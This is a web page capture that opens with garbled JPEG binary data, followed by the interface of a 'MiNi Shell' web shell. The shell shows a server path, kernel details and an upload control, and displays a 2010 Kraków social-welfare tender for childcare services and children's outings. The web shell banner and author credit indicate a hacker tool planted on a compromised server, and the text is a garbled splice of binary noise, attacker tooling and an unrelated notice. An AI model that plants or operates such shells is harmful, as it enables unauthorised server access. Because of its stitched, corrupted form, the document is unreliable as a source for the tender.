JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100819/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20100819/225391-N-2010.html

<p class="kh_header"><b>Kraków: świadczenie usługi opieki nad dziećmi oraz organizacji zajęć dla dzieci</b><br>
<b>Numer ogłoszenia: 225391 - 2010; data zamieszczenia: 19.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej w Krakowie , ul. Józefińska 14/002, 30-529 Kraków, woj. małopolskie, tel. 012 6165420, 6165424, faks 012 6165428.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mops.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> świadczenie usługi opieki nad dziećmi oraz organizacji zajęć dla dzieci.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest  świadczenie opieki nad dzieckiem oraz organizacji zajęć dla dzieci zgodnie  z poniższymi wytycznymi:
I część zamówienia - opieka nad dziećmi na czas uczestnictwa rodziców w projekcie Program pracy z rodziną wieloproblemową
1)	adresaci usługi: dzieci w wieku do 0 do lat 11
2)	liczba godzin świadczonej usługi - max 90
3)	termin realizacji: od dnia podpisania umowy do 15.12.2010. Zamówienie będzie realizowane na podstawie zamówień częściowych zgłaszanych /w formie faksu lub e-mail/ Wykonawcy do 7 dni przed rozpoczęciem realizacji usługi.
4)	czas realizacji  -od poniedziałku do piątku, w godzinach od 15.00-20.00
5)	miejsce: w granicach administracyjnych Krakowa w miejscu zamieszkania  dziecka.
6)	Wykonawca: podmiot prowadzący działalność gospodarczą polegającą na zapewnieniu opieki nad dziećmi, potwierdzony wpisem do właściwego rejestru
II część zamówienia - opieka nad dziećmi uczestników projektu Pora na aktywność
1)	adresaci usługi: dzieci w wieku 1-15 lat
2)	liczba godzin świadczonej usługi - nie więcej niż 23 220, na rzecz maksymalnie 1548 dzieci, w średnim wymiarze 15 godzin/dziecko
3)	usługa obejmuje:
a)	czynności opiekuńcze odpowiednie do wieku, wspierające prawidłowy rozwój dziecka
b)	niezbędne czynności pielęgnacyjne dzieci wymagających takich czynności
c)	zabawę połączoną z edukacją najmłodszych
d)	kreatywne spędzanie czasu - spacery, promowanie aktywnego spędzania czasu, gry i zabawy edukacyjne
e)	motywowanie do nauki i odrabiania zadań domowych
f)	pogłębianie/wspieranie zainteresowań dzieci
g)	opiekę nad dziećmi chorymi, niepełnosprawnymi, a także specjalnej troski (wykonywanie zaleceń lekarza, rehabilitanta) - w zakresie koniecznym do podtrzymania procesu leczenia w czasie nieobecności rodziców/opiekunów dziecka
4)	Wykonawca świadczy usługę na podstawie miesięcznego harmonogramu przekazanego przez Zamawiającego do trzech dni przed rozpoczęciem miesiąca, w którym świadczona ma być usługa. Harmonogram może być modyfikowany w trakcie miesiąca w związku z niemożliwymi do przewidzenia okolicznościami ze strony uczestników projektu lub Zamawiającego.
5)	Usługa może być świadczona u kilku beneficjentów w tym samym czasie.
6)	Wykonawca każdorazowo najpóźniej na dzień przed świadczeniem usługi przekaże Zamawiającemu (telefonicznie/e-mailem) dane osobowe opiekuna/opiekunki (imię, nazwisko, numer telefonu komórkowego i serię i numer dowodu osobistego lub numer legitymacji służbowej lub dane innego dokumentu ze zdjęciem umożliwiającego weryfikację tożsamości), a jeżeli usługa będzie świadczona w lokalu Wykonawcy także adres lokalu.
7)	Wykonawca zapewni dzieciom objętym opieką ubezpieczenie NNW /min.5 000/os
8)	Wykonawca informuje rodziców dzieci nad którymi sprawuje opiekę o współfinansowaniu usługi przez Unię Europejską, w przypadku świadczenia usługi w lokalu - oznakuje go logotypami POKL, UE-EFS oraz informacją o dofinansowaniu,
9)	Wykonawca każdorazowo informuje Zamawiającego (e-mail, telefon) o trudnościach/ problemach związanych z realizacją usługi, zwłaszcza w dostaniu się do lokalu uczestnika projektu, zachowaniem dziecka podczas usługi, stanem lub zachowaniem rodziców/ opiekunów/ osób trzecich i lokalu w związku z wykonywaną usługą.
10)	Jeżeli wykonawca stwierdzi zagrożenie zdrowia lub życia dziecka/ dzieci niezwłocznie poinformuje o tym Zamawiającego  - (e-mail, telefon).
11)	W przypadku sytuacji określonych w ust.1 część II pkt.6, 9 i 10 kontaktować należy się z Sekcją ds. Zarządzania Projektami tel. 12-257-00-79, e-mail sp@mops.krakow.pl 
12)	Czas realizacji: od poniedziałku do piątku w godzinach 7.00-20.00 
13)	Usługa świadczona w formie opieki godzinnej.
14)	Miejsce realizacji: w miejscu zamieszkania beneficjenta (obszar administracyjny Krakowa) lub w lokalu zapewnionym przez Wykonawcę - położony w granicach administracyjnych miasta Krakowa, w pobliżu linii tramwajowych lub autobusowych - przystanek MPK najdalej 500m od lokalu - po uzyskaniu zgody beneficjenta
15)	usługa obejmie max 1548 dzieci w tym:
a)	182 dzieci objętych pomocą przez Filię 1 - teren Dzielnicy II i III Miasta Krakowa
b)	167 dzieci objętych pomocą przez Filię 2 - teren Dzielnicy IV i VI Miasta Krakowa
c)	183 dzieci objętych pomocą przez Filię 3 - teren Dzielnicy IX, X, XIII Miasta Krakowa
d)	209 dzieci objętych pomocą przez Filię 4 - teren Dzielnicy XVII Miasta Krakowa
e)	100 dzieci objętych pomocą przez Filię 5 - teren Dzielnicy VIII Miasta Krakowa
f)	149 dzieci objętych pomocą przez Filię 6 - teren Dzielnicy I Miasta Krakowa
g)	122 dzieci objętych pomocą przez Filię 7 - teren Dzielnicy V i VII Miasta Krakowa
h)	187 dzieci objętych pomocą przez Filię 8 - teren Dzielnicy XI i XII Miasta Krakowa
i)	249 dzieci objętych pomocą przez Filię 9 - teren Dzielnicy XIV, XV, XVI, XVII Miasta Krakowa
16)	lokal Wykonawcy, w którym może odbywać się usługa powinien spełniać wymogi ustawy z dnia 07.09.1991 o systemie oświaty /tekst jednolity Dz.U 2004r nr 256 poz.2572 z późn.zm/, jak również rozporządzeń wykonawczych do w/w ustawy

III część zamówienia - organizacja zajęć dla dzieci w ramach projektu Pora na aktywność :Pal - stworzyć miejsce do życia
1)	Usługa obejmuje:
a)	zajęcia o charakterze edukacyjnym w Krakowskim Zoo i w Lasku Wolskim, zgodnie z wytycznymi:
- zorganizowanie 3 zajęć dla 6 dzieci w wieku 5-10 lat. (po 2 dzieci na jedne zajęcia)
- ilość godzin zegarowych : 9 ( 3 godziny na jedne zajęcia)
- program zajęć:
	wizyta w Zoo
	spacer po Lasku Wolskim
	wyjście na Kopiec Piłsudzkiego
	sesja zdjęciowa dla dzieci (dzieci fotografowane wspólnie lub ze zwierzętami)
	gry i zabawy na świeżym powietrzu
	quiz na temat egzotycznych zwierząt /15 pytań/
- każde dziecko otrzyma zapis zdjęć na płycie CD /min.20 zdjęć/ oraz jedno wywołane zdjęcie w formacie 13x18
b)	zajęcia o charakterze rozrywkowym w kinie Kijów zgodnie z wytycznymi:
- zorganizowanie 4 zajęć dla 8 dzieci w wieku 10-15 lat. (po 2 dzieci na jedne zajęcia)
- ilość godzin zegarowych : 8 ( 2 godziny na jedne zajęcia)
- program zajęć:
	seans filmowy w kinie Kijów
c)	zajęcia o charakterze kulturowym w Centrum Sztuki i Techniki Japońskiej Mangha zgodnie z wytycznymi
- zorganizowanie 3 zajęć dla 6 dzieci w wieku 10-15 lat. (po 2 dzieci na jedne zajęcia)
- ilość godzin zegarowych : 6 ( 2 godziny na jedne zajęcia)
- program zajęć:
	wizyta w centrum Kultury i Sztuki Japońskiej Mangha
	spacer bulwarami wiślanymi
d)	zajęcia o charakterze kulturowym w formie wizyty w Muzeum Inżynierii Lądowej zgodnie z wytycznymi
- zorganizowanie 3 zajęć dla 6 dzieci w wieku 10-15 lat. (po 2 dzieci na jedne zajęcia)
- ilość godzin zegarowych : 6 ( 2 godziny na jedne zajęcia)
- program zajęć:
	wizyta w Muzeum Inżynierii Lądowej
	spacer na ul. Starowiślną, skosztowanie lodów na ul. Starowiślnej. Każde dziecko otrzyma po 2 gałki lodów
e)	zajęcia o charakterze edukacyjnym w Ogrodzie Doświadczeń zgodnie z wytycznymi
- zorganizowanie 3 zajęć dla 6 dzieci w wieku 5-10 lat. (po 2 dzieci na jedne zajęcia)
- ilość godzin zegarowych : 6 ( 2 godziny na jedne zajęcia)
- program zajęć:
	zwiedzanie ogrodu doświadczeń
	sesja zdjęciowa dla dzieci 
- każde dziecko otrzyma zapis zdjęć na płycie CD /min.20zdjęć/ oraz jedno wywołane zdjęcie w formacie 13x18
f)	zajęcia o charakterze sportowym w Parku Wodnym zgodnie z wytycznymi
- zorganizowanie 5 zajęć dla 10 dzieci w wieku 10-15 lat. (po 2 dzieci na jedne zajęcia)
- ilość godzin zegarowych : 10 ( 2 godziny na jedne zajęcia)
- program zajęć:
	Agua Park - zjeżdżalnie, jacuzzi, rwąca rzeka
g)	zajęcia o charakterze kulturowym w formie rejsu statkiem po Wiśle do Tyńca zgodnie z wytycznymi
- zorganizowanie 2 zajęć dla 4 dzieci w wieku 5-15 lat. (po 2 dzieci na jedne zajęcia)
- ilość godzin zegarowych : 8 ( 4 godziny na jedne zajęcia)
- program zajęć:
	rejs statkiem po Wiśle z Krakowa do Tyńca i z powrotem
h)	zajęcia o charakterze kulturowym w Fabryce Schindlera zgodnie z wytycznymi
- zorganizowanie 3 zajęć dla 6 dzieci w wieku 12-15 lat. (po 2 dzieci na jedne zajęcia)
- ilość godzin zegarowych : 6 ( 2 godziny na jedne zajęcia)
- program zajęć:
	wizyta w Fabryce Schindlera
	wejście na Kopiec Kraka
	quiz dotyczący wiadomości na temat II wojny światowej
i)	zajęcia o charakterze edukacyjnym w formie zwiedzania Parku Edukacji Rozwojowej i Klasztoru Benedyktynów w Tyńcu zgodnie z wytycznymi
- zorganizowanie 4 zajęć dla 8 dzieci w wieku 5-12 lat. (po 2 dzieci na jedne zajęcia)
- ilość godzin zegarowych : 12 ( 3 godziny na jedne zajęcia)
- program zajęć:
	wizyta w Parku Edukacji Rozwojowej na ul. Tynieckiej połączona z warsztatami (do wyboru ghański, peruwiański, indiański, inuicki, mongolski, papuaski) zapoznanie się z warunkami życia dzieci na innych kontynentach
	zwiedzanie Klasztoru Benedyktynów w Tyńcu
j)	zajęcia o charakterze kulturowym w formie zwiedzania Wawelu zgodnie z wytycznymi
- zorganizowanie 3 zajęć dla 6 dzieci w wieku 10-15 lat. (po 2 dzieci na jedne zajęcia)
- ilość godzin zegarowych : 6 ( 2 godziny na jedne zajęcia)
- program zajęć:
	zwiedzanie Reprezentacyjnych Komnat Królewskich na Wawelu oraz Smoczej Jamy
	quiz kulturowo -historyczny /15 pytań/
k)	zajęcia o charakterze turystycznym i  edukacyjnym w miejscowości Korzkiew i w Pieskowej Skale zgodnie z wytycznymi
- zorganizowanie 3 zajęć dla 6 dzieci w wieku 10-15 lat. (po 2 dzieci na jedne zajęcia)
- ilość godzin zegarowych : 9 ( 3 godzin na jedne zajęcia)
- program zajęć:
	zwiedzanie Zamku Korzkiew oraz w Pieskowej Skale
	zwiedzanie Jaskini Ciemnej
	sesja zdjęciowa przez cały czas trwania wycieczki
- każde dziecko otrzyma zapis zdjęć na płycie CD /min. 20zdjęć/oraz jedno grupowe zdjęcie wywołane w formacie 13x18
- dojazd samochodem lub busem zapewnia organizator
l)	zajęcia o charakterze kulturowym w formie muzeum zgodnie z wytycznymi
- zorganizowanie 2 zajęć dla 4 dzieci w wieku 10-15 lat. (po 2 dzieci na jedne zajęcia)
- ilość godzin zegarowych : 5 ( 2,5 godziny na jedne zajęcia)
- program zajęć:
	zwiedzanie Muzeum Lotnictwa
	udział w lekcji muzealnej pt. Od Dedala - historia szybownictwa
	sesja zdjęciowa dla dzieci w Muzeum Lotnictwa
- każde dziecko otrzyma zapis zdjęć na płycie CD/min.20 zdjęć/ oraz jedno wywołane zdjęcie w formacie 13x18

2)	Zajęcia odbywać się będą w soboty, niedziele i święta ustawowo wolne od pracy, bądź w dzień powszedni po godz.16.00
3)	Wykonawca zapewni opiekę nad dziećmi podczas zajęć
4)	Zajęcia będą urozmaicone i zorganizowane w atrakcyjnej dla dzieci formie, 
5)	Wykonawca zapewnia ubezpieczenie dzieci NNW na kwotę min.5000zł/os
6)	Wykonawca świadczy usługę na podstawie harmonogramu przekazanego przez Zamawiającego do 5 dni przed rozpoczęciem zajęć. Harmonogram może być modyfikowany w trakcie trwania usługi w związku z niemożliwymi do przewidzenia okolicznościami ze strony uczestników projektu lub Zamawiającego.
7)	Dzieci będą odbierane od rodziców przez Wykonawcę i odprowadzane do domu po zajęciach wg harmonogramu o którym mowa w ust.1 część III pkt 6.
8)	Usługa obejmuje dzieci zamieszkałe na terenie  Dzielnicy XIII  Miasta Krakowa
9)	Poszczególne zajęcia nie będą odbywały się w jednym czasie.
10)	Czas dojazdu nie jest wliczany w czas trwania zajęć
11)	Bilety na transport MPK dla dzieci zapewnia Zamawiający (z wyjątkiem zajęć o których mowa w pkt 1 lit.k)
12)	Termin realizacji od dnia podpisania umowy do 31.10.2010
13)	Wykonawca każdorazowo najpóźniej na dzień przed świadczeniem usługi przekaże Zamawiającemu (telefonicznie/e-mailem) dane osobowe opiekuna/opiekunki (imię, nazwisko, numer telefonu komórkowego i serię i numer dowodu osobistego lub numer legitymacji służbowej lub dane innego dokumentu ze zdjęciem umożliwiającego weryfikację tożsamości), 
14)	Wykonawca każdorazowo informuje Zamawiającego (e-mail, telefon) o trudnościach/ problemach związanych z realizacją usługi, zwłaszcza zachowaniem dziecka podczas usługi, stanem lub zachowaniem rodziców/ opiekunów/ osób trzecich w związku z wykonywaną usługą.
15)	Jeżeli wykonawca stwierdzi zagrożenie zdrowia lub życia dziecka/ dzieci niezwłocznie poinformuje o tym Zamawiającego  - (e-mail, telefon) 
16)	W przypadku sytuacji określonych w ust.1 część III pkt.13-15 kontaktować należy się z Sekcją ds. Zarządzania Projektami tel. 12-257-00-79, e-mail sp@mops.krakow.pl 
17)	Wykonawca informuje rodziców dzieci nad którymi sprawuje opiekę o współfinansowaniu usługi przez Unię Europejską
2.	Warunki płatności: 
1)	okres rozliczeniowy ustala się na miesiąc kalendarzowy.
2)	wynagrodzenie płatne będzie po zakończeniu każdego okresu rozliczeniowego przelewem na konto Wykonawcy w ciągu 14 dni od daty przyjęcia faktury/rachunku częściowego przez Zamawiającego.
3)	Wykonawca załączy do rachunku/faktury wykaz faktycznie wykonanych prac w ramach usługi wg wzoru stanowiącego załącznik nr 1 do siwz.
3.	Warunki dodatkowe: 
1)	Wykonawca dokona zmiany osoby realizującej usługę na wniosek Zamawiającego w przypadku nienależytego wykonywania obowiązków lub na wniosek Wykonawcy, uzasadniony obiektywnymi okolicznościami.
2)	Zamawiający, a także podmiot kontrolujący Zamawiającego może w każdej chwili skontrolować Wykonawcę w zakresie świadczonej przez niego usługi..
3)	Wykonawca dostarczy polisę ubezpieczeniową potwierdzającą wykonanie warunku ubezpieczenia dzieci od NNW przed podjęciem opieki/rozpoczęciem zajęć.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający może udzielić Wykonawcy zamówień uzupełniających w trybie zamówienia z wolnej ręki w okresie 3 lat od udzielenia zamówienia podstawowego, stanowiących nie więcej niż 50 % wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówienia</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 85.31.21.10-3, 85.31.21.20-6, 63.51.10.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)	w przypadku I części zamówienia: 
a)	prowadzi działalność gospodarczą polegającą na zapewnieniu opieki nad dziećmi
b)	wykształcenie osób realizujących usługę: wyższe pedagogiczne, psychologiczne, nauki o rodzinie lub rozpoczęte studia na tych kierunkach
c)	doświadczenie zawodowe osób realizujących usługę - min. roczne doświadczenie zawodowe w zakresie opieki nad dziećmi, /min. 250godzin/
2)	w przypadki II części zamówienia
a)	wpis do ewidencji działalności gospodarczej lub uzyskanie zezwolenia jednostki samorządu terytorialnego (dot. osób prowadzących publiczne formy opieki nad dziećmi)
b)	wykształcenie osób realizujących usługę: nie niższe niż średnie, w ramach którego realizowane były przedmioty dotyczące psychologii rozwoju dziecka, pedagogiki lub opieki nad dzieckiem w wymiarze min. 40godzin
c)	doświadczenie zawodowe osób realizujących usługę: min. 120 godzin
3)	w przypadku III części zamówienia:
a)	prowadzi działalność gospodarczą polegającą na organizacji zajęć dla dzieci stanowiących przedmiot zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany mogą dotyczyć takich kwestii jak: termin realizacji zamówienia, warunki płatności, podwykonawcy oraz miejsce realizacji zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mops.krakow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> MOPS Kraków ul.Józefińska 14 pok.002.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.08.2010 godzina 08:00, miejsce: Dziennik Podawczy MOPS Kraków ul.Jóżefińska 14.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Pora na aktywność.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com